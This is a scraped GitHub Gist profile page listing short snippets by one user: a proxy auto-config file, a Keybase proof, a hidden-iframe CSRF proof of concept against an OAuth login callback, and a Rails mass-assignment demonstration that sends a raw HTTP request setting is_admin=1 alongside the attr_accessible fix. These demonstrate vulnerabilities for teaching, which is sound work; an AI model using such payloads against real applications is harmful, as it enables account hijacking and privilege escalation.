Skip to content

Instantly share code, notes, and snippets.

Michiel Prins michiel3

Block or report user

Report or block michiel3

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@michiel3
michiel3 / h1.pac
Last active Aug 30, 2018 — forked from RSO/h1.pac
View h1.pac
function FindProxyForURL(url, host) {
var site_list = [
"localhost",
"127.0.0.1",
"ci.inverselink.com",
"payments-production.inverselink.com"
];
if (site_list.includes(host)) {
return "SOCKS5 127.0.0.1:8888";
View keybase.md

Keybase proof

I hereby claim:

  • I am michiel3 on github.
  • I am michiel (https://keybase.io/michiel) on keybase.
  • I have a public key whose fingerprint is 7CAA CE4D A70C 4C8A FE94 A75C 9F46 3C34 FAA0 2F3D

To claim this, I am signing this object:

@michiel3
michiel3 / csrf-oauth.html
Created Jul 5, 2012
CSRF OAuth vulnerability
View csrf-oauth.html
<iframe src="https://vulnerableapp.com/auth/facebook?code=dGhpcyBpcyBub3QgbXkgcGFzc3dvcmQh..."
style="display:none;"></iframe>
@michiel3
michiel3 / massassignmentenabled.rb
Created Mar 6, 2012
Mass assignment protection enabled
View massassignmentenabled.rb
1.8.7-p352 :022 > User.create(:username => "michiel", :password => "password", :email => "info@online24.nl", :is_admin => 1)
ActiveModel::MassAssignmentSecurity::Error: Can't mass-assign protected attributes: is_admin
@michiel3
michiel3 / is_admin
Created Mar 6, 2012
Create user object with is_admin=1
View is_admin
root@pentest:~# nc -v localhost 3000
Connection to localhost 3000 port [tcp/hbci] succeeded!
POST /users HTTP/1.1
Host: localhost
Content-Length: 93
user[username]=michiel&user[password]=password&user[email]=info@online24.nl&user[is_admin]=1
@michiel3
michiel3 / create_user
Created Mar 6, 2012
Create user object
View create_user
root@pentest:~# nc -v localhost 3000
Connection to localhost 3000 port [tcp/hbci] succeeded!
POST /users HTTP/1.1
Host: localhost
Content-Length: 76
user[username]=michiel&user[password]=password&user[email]=info@online24.nl
@michiel3
michiel3 / scheme.rb
Created Mar 6, 2012
Mass assignment example scheme
View scheme.rb
ActiveRecord::Schema.define(:version => 20120306115211) do
create_table "users", :force => true do |t|
t.string "username"
t.string "password"
t.string "email"
t.boolean "is_admin"
end
end
@michiel3
michiel3 / user.rb
Created Mar 6, 2012
Mass assignment protection
View user.rb
class User < ActiveRecord::Base
attr_accessible :username, :password, :email
end
You can’t perform that action at this time.